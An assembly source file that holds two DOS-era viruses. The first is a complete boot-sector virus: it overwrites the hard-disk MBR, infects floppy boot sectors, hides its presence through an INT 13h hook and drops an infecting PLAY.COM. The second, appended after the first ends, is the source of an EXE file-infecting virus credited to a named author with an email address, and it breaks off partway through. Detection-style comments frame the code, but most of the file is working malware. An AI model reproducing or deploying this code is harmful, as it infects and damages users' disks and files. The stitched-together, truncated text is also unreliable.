📄 vv3.asm
CSEG SEGMENT
ASSUME CS:CSEG
;-----------------------------------------------------------------------
; BEGIN - common entry point for both ways this 512-byte image runs.
; It is either booted from the hard-disk MBR (CS = 0000h, IP = 7C00h) or
; executed from DOS as PLAY.COM (CS = PSP segment). The value of CS is
; the only thing that tells the two apart, so it is tested here.
; Analyst note: nothing else in the image is relocated for .COM use;
; the dropper path (FILE) deliberately avoids CS-relative data.
;-----------------------------------------------------------------------
BEGIN: MOV AX,CS
CMP AX,0                                ; CS == 0 -> booted at 0000:7C00h
JZ START                                ; boot path
JMP FILE                                ; .COM path: MBR dropper
;********************************** DATA
; Variables embedded in the boot-sector image. The code is assembled at
; offset 0 but first executes at 0000:7C00h, so the boot path adds 7C00h
; to these offsets until it has relocated itself to segment 0020h
; (see START/NEXT).
DATE DB 00H                             ; RTC day-of-month (BCD), stored by NEXT, tested by GR against 15H
PZ DB 77H                               ; infection marker byte; NEXT (in the MBR) and FILE (in low memory) test it for 77H
TIME DW 200H                            ; timer-tick countdown decremented by NEW08 (reloaded to 200H on expiry)
JMPA DW 7C00H                           ; far pointer 0000:7C00h - used to jump into the original MBR
DW 0000H
JMPN DW OFFSET NEXT                     ; far pointer 0020:NEXT - continuation after relocation to segment 0020h
DW 0020H
FN DB 'PLAY.COM',0                      ; file name created by NEWF in the current directory
;************************************
;-----------------------------------------------------------------------
; START - boot path, entered at 0000:7C00h.
; Sets DS = SS = ES = 0000h with the stack just below the load address,
; saves the BIOS INT 8 vector (0000:0020h) into the INT 60h slot
; (0000:0180h), copies the whole sector to 0000:0200h - i.e. segment
; 0020h, where the assembled offsets become valid - and far-jumps there.
; Forensic note: linear 00200h-003FFh is the upper half of the interrupt
; vector table (vectors 80h-FFh), so after this runs those vectors hold
; code, and vector 60h holds the original INT 8 entry.
;-----------------------------------------------------------------------
START: XOR AX,AX
MOV DS,AX
MOV SS,AX
MOV ES,AX
MOV SP,7C00H                            ; stack grows down from the load address
MOV AX,DS:[20H]                         ; original INT 8 vector (offset) ...
MOV DS:[180H],AX                        ; ... parked in the INT 60h slot; NEW08/GR chain with INT 60H
MOV AX,DS:[22H]                         ; (segment)
MOV DS:[182H],AX
MOV SI,SP                               ; source 0000:7C00h (this sector)
MOV DI,0200H                            ; destination 0000:0200h = 0020:0000h
MOV CX,0200H                            ; 512 bytes
CLD
REP MOVSB
MOV BX,OFFSET JMPN+7C00H                ; +7C00h: still executing at the un-relocated address
JMP DWORD PTR CS:[BX]                   ; far jump to 0020:NEXT
;-----------------------------------------------------------------------
; NEXT - runs from segment 0020h with DS = ES = 0000h.
; 1. Points INT 8 at 0020:NEW08.
; 2. Reads the MBR of drive 80h (C/H/S 0/0/1) into 0000:0600h.
; 3. If the MBR does not carry the marker (byte PZ == 77h): writes that
;    original MBR to C/H/S 0/0/23 (CX=0017h), overwrites the buffer
;    with the full 512-byte image from 0000:0200h and writes it back as
;    the new MBR. Because all 512 bytes are copied, the partition table
;    area (1BEh-1FFh) of the written MBR comes from the image, not from
;    the disk being infected.
; 4. Reads sector 23 (the parked original MBR) to 0000:7C00h, stores
;    the RTC day in DATE and far-jumps to 0000:7C00h.
; Detection: sector C/H/S 0/0/23 holding a valid MBR, and 77h at
; offset PZ of the live MBR. No INT 13h return status is checked.
;-----------------------------------------------------------------------
NEXT: MOV AX,OFFSET NEW08               ; INT 8 := 0020:NEW08 (timer-tick hook)
MOV DS:[20H],AX
MOV AX,0020H
MOV DS:[22H],AX
MOV BX,0600H                            ; ES:BX = 0000:0600h sector buffer
MOV AX,0201H                            ; AH=02h read, AL=1 sector
MOV CX,0001H                            ; cylinder 0, sector 1 (MBR)
MOV DX,0080H                            ; head 0, drive 80h (first hard disk)
INT 13H                                 ; CF (error) not checked
CMP BYTE PTR ES:[PZ+0600H],077H         ; marker already in the MBR?
JZ NC                                   ; yes -> do not re-infect
MOV AX,0301H                            ; AH=03h write 1 sector:
MOV CX,0017H                            ; park the original MBR at cylinder 0, sector 23
MOV DX,0080H
INT 13H
MOV SI,0200H                            ; copy this image (0020:0000h) ...
MOV DI,0600H                            ; ... over the whole MBR buffer
MOV CX,0200H                            ; 512 bytes, partition table included
CLD
REP MOVSB
MOV AX,0301H                            ; write the buffer back as the new MBR
MOV CX,0001H
MOV DX,0080H
INT 13H
NC: MOV BX,7C00H                        ; load the parked original MBR to 0000:7C00h
MOV AX,0201H
MOV CX,0017H
MOV DX,0080H
INT 13H
MOV AH,04H                              ; INT 1Ah AH=04h: read RTC date, DL = day (BCD)
INT 1AH
MOV CS:[DATE],DL                        ; GR later compares this with 15H
MOV BX,OFFSET JMPA
JMP DWORD PTR CS:[BX]                   ; far jump to 0000:7C00h -> original boot code
;***********************************RUN HD BOOTER PRG
;-----------------------------------------------------------------------
; NEW08 - first-stage INT 8 (timer tick) handler installed by NEXT.
; Decrements TIME on every tick (200h ticks, roughly half a minute at
; the 18.2 Hz tick rate). When it reaches zero the second stage is
; installed, all in segment 0020h:
;   current INT 13h vector (0000:004Ch) saved into the INT 61h slot
;   INT 8   := GR     (this handler is replaced)
;   INT 13h := NEW13  (BIOS disk hook)
;   INT 25h := NEWF   (0000:0094h; DOS absolute disk read)
; and TIME is reloaded. Every tick chains to the original INT 8 via
; INT 60H (saved there by START).
; Detection: vectors 8, 13h and 25h pointing into segment 0020h;
; vectors 60h/61h holding BIOS entry points.
;-----------------------------------------------------------------------
NEW08: PUSH AX
PUSH DS
DEC CS:[TIME]
JNZ I08                                 ; countdown not finished: just chain
XOR AX,AX
MOV DS,AX                               ; DS = 0000h (vector table)
MOV AX,DS:[4CH]                         ; current INT 13h vector ...
MOV DS:[184H],AX                        ; ... parked in the INT 61h slot (NEW13 chains with INT 61H)
MOV AX,DS:[4EH]
MOV DS:[186H],AX
MOV AX,OFFSET GR                        ; INT 8 := 0020:GR
MOV DS:[20H],AX
MOV AX,OFFSET NEW13                     ; INT 13h := 0020:NEW13
MOV DS:[4CH],AX
MOV AX,OFFSET NEWF                      ; INT 25h := 0020:NEWF (original INT 25h is NOT saved)
MOV DS:[94H],AX
MOV AX,0020H                            ; segment part of the three vectors above
MOV DS:[22H],AX
MOV DS:[4EH],AX
MOV DS:[96H],AX
MOV CS:[TIME],200H
I08: POP DS
POP AX
INT 60H                                 ; original INT 8
IRET
;***************************************
;-----------------------------------------------------------------------
; NEW13 - INT 13h (BIOS disk) hook installed by NEW08. Every call ends
; by passing through to the original handler via INT 61H.
;  * AH=03h (write) with DL=00h (first floppy): before the caller's
;    write, the resident image (ES:BX = CS:0000h, one 512-byte sector,
;    BPB/partition-table bytes included) is written to C/H/S 0/0/1 of
;    drive 0 - the floppy boot sector.
;  * AH=02h/03h with DX=0080h (head 0, drive 80h) and CX=0001h
;    (cylinder 0, sector 1): CX is changed to 0017h, so reads and writes
;    of the MBR are redirected to the parked original at sector 23.
;    Tools reading the MBR through INT 13h therefore see a clean sector
;    (stealth), and writes never reach the infected sector.
;  * Everything else is passed through unchanged.
; NOTE(review): the chain is INT 61H followed by IRET, so the flags
; left by the original handler (CF = error status) are replaced by the
; caller's saved flags; it looks like callers never see INT 13h error
; status through this hook - confirm.
;-----------------------------------------------------------------------
NEW13: CMP AH,02H
JZ CNE                                  ; read -> redirection check
CMP AH,03H
JNZ I13                                 ; not a write -> pass through
CMP DL,00H
JNZ CNE                                 ; write to another drive -> redirection check
PUSH AX                                 ; write to floppy A: -> infect its boot sector first
PUSH BX
PUSH CX
PUSH DX
PUSH ES
PUSH CS
POP ES                                  ; ES:BX = 0020:0000h, the resident image
MOV AX,0301H                            ; write 1 sector
XOR BX,BX
MOV CX,0001H                            ; cylinder 0, sector 1
MOV DX,BX                               ; head 0, drive 0
INT 61H                                 ; original INT 13h
POP ES
POP DX
POP CX
POP BX
POP AX
JMP I13                                 ; then perform the caller's own write
CNE: CMP DX,0080H                       ; head 0, first hard disk?
JNZ I13
CMP CX,0001H                            ; cylinder 0, sector 1 (MBR)?
JNZ I13
MOV CX,0017H                            ; -> sector 23, the parked original MBR
I13: INT 61H                            ; original INT 13h
IRET
;*******************************************
;-----------------------------------------------------------------------
; NEWF - INT 25h (DOS absolute disk read) hook installed by NEW08.
; Drops the resident image to disk as a file: creates PLAY.COM
; (INT 21h AH=3Ch, attribute 1 = read-only) in the current directory,
; writes 400h bytes starting at 0020:0000h (INT 21h AH=40h) - the
; 512-byte image followed by the next 512 bytes of low memory, which
; include the BIOS data area at 0040:0000h - closes the handle, resets
; the video mode, and terminates the interrupted process (JMP NCF ->
; INT 21h AH=4Ch).
; Note: NEW08 never saved the original INT 25h vector and this handler
; never chains, so the caller's disk read is not performed; the caller
; is terminated instead. No DOS return status is checked.
;-----------------------------------------------------------------------
NEWF: PUSH CS
POP DS                                  ; DS = 0020h, so image offsets are valid for DS:DX
MOV DX,OFFSET FN                        ; "PLAY.COM"
MOV CX,00000001B                        ; attribute: read-only
MOV AH,3CH                              ; DOS create (or truncate) file
INT 21H                                 ; AX = handle
MOV BX,AX
MOV AH,40H                              ; DOS write to handle
MOV CX,400H                             ; 1024 bytes ...
XOR DX,DX                               ; ... from 0020:0000h
INT 21H
MOV AH,3EH                              ; DOS close handle
INT 21H
MOV AX,0003H                            ; INT 10h: set 80x25 text mode (clears the screen)
INT 10H
JMP NCF                                 ; terminate the interrupted program
;-----------------------------------------------------------------------
; GR - second-stage INT 8 handler (replaces NEW08 once TIME expires).
; On every timer tick issues INT 10h AH=09h (write character and
; attribute at the cursor) with AL=00h and CX=1, i.e. it keeps
; overwriting the character cell under the cursor. Unless DATE (RTC
; day, BCD) equals 15H, BX is set to 0007h first (page 0, attribute 7);
; on the 15th BX is left as the interrupted code had it, so page and
; attribute are whatever happens to be in BX. Chains to the original
; INT 8 via INT 60H.
;-----------------------------------------------------------------------
GR: PUSH AX
PUSH BX
PUSH CX
MOV AX,0900H                            ; AH=09h write char+attribute, AL=00h
MOV CX,0001H                            ; one cell
CMP CS:[DATE],15H                       ; 15th of the month?
JZ GR1                                  ; yes: use the caller's BX as page/attribute
MOV BX,111B                             ; BH=0 (page 0), BL=7 (attribute)
GR1: INT 10H
NG: POP CX
POP BX
POP AX
INT 60H                                 ; original INT 8
IRET
;************************************
;-----------------------------------------------------------------------
; FILE - dropper path, reached when the image runs from DOS as a .COM
; (CS = PSP, code at offset 100h). Sets DS = 0000h, ES = CS.
; 1. If 0000:0200h+PZ already holds 77h (a copy is resident at segment
;    0020h) -> exit. Otherwise writes 77h there; nothing is made
;    resident on this path, only the low-memory marker is set.
; 2. Reads the MBR of drive 80h into CS:0300h and writes it to
;    C/H/S 0/0/23 (CX=0017h), parking the original MBR.
; 3. Copies 1B0h bytes of the running .COM image (CS:0100h) over the
;    first 1B0h bytes of the buffer - the partition table at 1BEh-1FFh
;    is preserved on this path - and writes the buffer back as the MBR.
; 4. Terminates via NCF (INT 21h AH=4Ch).
; Note: the decision is made only from the low-memory byte, not from
; the MBR itself; if the MBR is already infected but no copy is
; resident (e.g. the machine was booted from a clean floppy), the
; infected MBR is parked into sector 23 and the original copy is lost.
; No INT 13h return status is checked.
;-----------------------------------------------------------------------
FILE: PUSH CS
POP ES                                  ; ES = CS: the ES:BX buffer below is inside the .COM segment
XOR AX,AX
MOV DS,AX                               ; DS = 0000h
CMP BYTE PTR DS:[200H+PZ],77H           ; resident copy present at 0020:PZ?
JZ NCF                                  ; yes -> nothing to do
MOV AH,77H
MOV DS:[200H+PZ],AH                     ; set the low-memory marker
MOV BX,0300H                            ; ES:BX = CS:0300h buffer
MOV AX,0201H                            ; read 1 sector ...
MOV CX,0001H                            ; ... C/H/S 0/0/1 (MBR) ...
MOV DX,0080H                            ; ... of drive 80h
INT 13H
MOV AX,0301H                            ; write the original MBR to cylinder 0, sector 23
MOV CX,0017H
MOV DX,0080H
INT 13H
PUSH CS
POP DS                                  ; DS = CS
MOV SI,0100H                            ; source: the running .COM image
MOV DI,BX                               ; destination: start of the MBR buffer
MOV CX,01B0H                            ; 432 bytes - stops short of the partition table at 1BEh
CLD
REP MOVSB
MOV AX,0301H                            ; write the patched buffer back as the MBR
MOV CX,0001H
MOV DX,0080H
INT 13H
NCF: MOV AH,4CH                         ; DOS terminate process (also the exit used by NEWF)
INT 21H
CSEG ENDS
END BEGIN
;姓名:展姚
;性别:女
;年龄:17
;英文名:cat
;主要作品:X-cat,i-worm.snw12等
;e-mail:suruixuan1@sina.com
;================== virus: baby Ver 1.01B2================
;=================== write begin: 2-7-2000 =================
;=================== finished : 2-7-2000 =================
;instruction:
; I . The virus stays resident in memory (hooks INT 21h)
;
; II . It only infects EXE files
;
; III. The virus only infects a file when the file is
; larger than 1980 bytes.
;
; IV . The infection mark is the infected file's time stamp,
; which is set to TIME: SECOND => 12'22''
;
; * V . The virus can override the READ_ONLY attribute!!!
;
; VI . The in-memory residency mark can be
; checked this way :
; + MOV AX,30AE
; + INT 21
;
; * CX=04C6 => the virus is already resident in memory
; * else => the virus is not resident in memory
;===============================================================
; .radix 16
; .model tiny
; .286c
; .code
; org 0
;-----------------------------------------------------------------------
; start - entry point inside an infected host. Numbers are hexadecimal
; (the commented-out .radix 16 above).
; Delta-offset technique: CALL/POP yields the runtime address of
; `position`, from which the runtime offset of `start` is recovered
; into SI (the body sits at a different offset in every host).
; Then asks a possibly resident copy whether it is installed: INT 21h
; AX=30AEh (AH=30h "get DOS version" with the private value AEh in AL);
; the resident hook answers CX=04C6h. Not resident -> install,
; resident -> run_host.
; Detection: a process issuing INT 21h AX=30AEh, or an INT 21h handler
; answering it with CX=04C6h, identifies this family.
;-----------------------------------------------------------------------
start:
push es                                 ; save the original PSP segment (popped again in run_exe)
call position                           ; push the address of `position` ...
position:                               ; (author's note: the offset could also be read back via an interrupt return, as an anti-DEBUG variant)
pop si                                  ; ... and read it back: SI = runtime offset of `position`
sub si,position-start                   ; SI = runtime offset of `start` (the delta)
push si                                 ; kept on the stack for run_host
mov ax,30AE                             ; "get DOS version" carrying the residency marker AEh
int 21                                  ; really a residency check
cmp cx,04c6                             ; CX=04C6h means a copy is already resident
jne install                             ; not resident -> go resident
jmp run_host                            ; resident -> run the original program
;-----------------------------------------------------------------------
; install - reached when no resident copy answered. Checks the trigger
; date first; on any other day control falls through to no_active,
; which goes resident.
;-----------------------------------------------------------------------
install:
;================================================================
;You can add active code here: Don't be too cruel!   (author's note)
;================================================================
; active_check - payload trigger. INT 21h AH=2Ah returns the date with
; DH = month and DL = day; 0C16h is December (0Ch) 22nd (16h).
active_check:
mov ah,2a                               ; DOS get date
int 21
cmp dx,0c16                             ; December 22nd?
jz active                               ; yes -> payload
jmp no_active                           ; no -> go resident
; active - payload: shows two messages (active_mess, active_other_mess)
; in colours COLOR1/COLOR2 through write_on_screen, waiting for a key
; after each, then runs the host WITHOUT going resident. The messages,
; colours and write_on_screen are defined outside this excerpt; from
; the calls here write_on_screen takes SI = message address and
; BL = colour - confirm against its definition.
active:
push cs
pop ds                                  ; DS = CS
push si                                 ; SI (delta) is modified below, keep a copy
mov bl,COLOR1
mov dx,offset active_mess-start         ; message offset relative to start ...
add si,dx                               ; ... plus delta = runtime address
call write_on_screen                    ; show the first message
mov ah,00                               ; BIOS INT 16h AH=00h: wait for a keystroke
int 16
pop si
push si
mov bl,COLOR2
mov dx,offset active_other_mess-start   ; second message
add si,dx
call write_on_screen
mov ah,00                               ; wait for a keystroke
int 16
pop si
jmp run_host
;================================================================
;-----------------------------------------------------------------------
; no_active - go resident without any DOS memory-allocation call.
; 1. INT 21h AH=52h returns ES:BX -> DOS "list of lists"; the word at
;    ES:[BX-2] is the segment of the first memory control block (MCB).
; 2. Walk the MCB chain (next = seg + size + 1) until the block whose
;    type byte is 'Z' (5Ah, the last block).
; 3. Shrink that block by vir_para paragraphs (vir_para is defined
;    outside this excerpt); if it is too small, run the host instead.
; 4. The paragraphs carved off the top become the resident segment:
;    vir_bytes bytes are copied from DS:SI (the body inside the host)
;    to ES:0000h there.
; 5. Swap the INT 21h vector (0000:0084h) with new_int21 in the
;    resident segment and keep the previous vector in oldint21 (both
;    defined outside this excerpt).
; Detection: the resident code lives above the last MCB and is not part
; of the MCB chain, so MCB-walking tools do not list it; the gap between
; the end of the 'Z' block and the real top of conventional memory, and
; an INT 21h vector pointing into that gap, are the indicators.
;-----------------------------------------------------------------------
no_active:
mov ah,52                               ; DOS: get list of lists -> ES:BX
int 21
mov bx,es:[bx-2]                        ; segment of the first MCB
xor di,di                               ; DI = 0: MCB fields are read as ES:[DI+n]
loop_search:
mov es,bx                               ; ES = current MCB
add bx,word ptr es:[di+3]               ; + size in paragraphs (MCB+3) ...
inc bx                                  ; ... + 1 for the MCB itself = next MCB
cmp byte ptr es:[di],5a                 ; type byte 'Z' = last block?
jnz loop_search
;================Found Last MCB=========
mov bx,es                               ; BX = segment of the last MCB
mov ax,word ptr es:[di+3]               ; AX = its size in paragraphs
sub ax,vir_para                         ; minus the paragraphs the virus needs
jnc keep_in_memory                      ; fits
jmp run_host                            ; too small: stay non-resident
keep_in_memory:
mov word ptr es:[di+3],ax               ; shrink the last block
add bx,ax                               ; BX = last MCB + new size + 1 ...
inc bx                                  ; ... = first paragraph of the carved-off area
mov es,bx                               ; ES = resident segment
push cs
pop ds                                  ; DS = CS
mov cx,vir_bytes                        ; copy DS:SI (body in the host) -> ES:0000h (DI is still 0)
cld
rep movsb
;===============hook int 21============
; The virus in memory address is:[BX:0]
;======================================
xor si,si
mov ds,si                               ; DS = 0000h: interrupt vector table
mov dx,offset new_int21-start           ; offset of the new handler inside the resident image
cli
xchg ds:word ptr [21*4],dx              ; install new offset, DX = old offset (21h*4 = 84h)
xchg ds:word ptr [21*4+2],bx            ; install resident segment, BX = old segment
mov es:word ptr oldint21,dx             ; keep the previous INT 21h vector in the resident copy
mov es:word ptr oldint21+2,bx
sti
;==============run host================
;-----------------------------------------------------------------------
; run_host - hand control to the original host program.
; Recovers the delta (SI) and locates old_header, the saved original
; file header (defined outside this excerpt). Its first two bytes are
; summed: 'M'+'Z' = 4Dh+5Ah = 0A7h marks an EXE header; anything else
; is treated as a .COM host.
;-----------------------------------------------------------------------
run_host:
push cs
pop ds                                  ; DS = CS
pop si                                  ; SI = delta pushed by start
mov di,offset old_header-start
add di,si                               ; DI -> saved original header
mov al,byte ptr [di]                    ; AL = header[0] + header[1]
add al,byte ptr [di+1]
cmp al,0a7                              ; 'M'+'Z'?
jne run_com                             ; (4D+5A=0A7)
jmp run_exe
; run_com - .COM hosts are not supported in this version: the process
; is terminated with INT 20h and the host never runs.
run_com:
;=======================================
;You can add run .com file here!   (author's note)
;=======================================
int 20                                  ; DOS: terminate program
run_exe:
mov di,offset old_header-start
add di,si ;将OLD_HEADER 地址送入DI
pop cx ;原PSP出栈
mov dx,cx
add dx,10 ;原PSP +10H
mov ax,word ptr [di+0e] ;原程序SS 偏移送入AX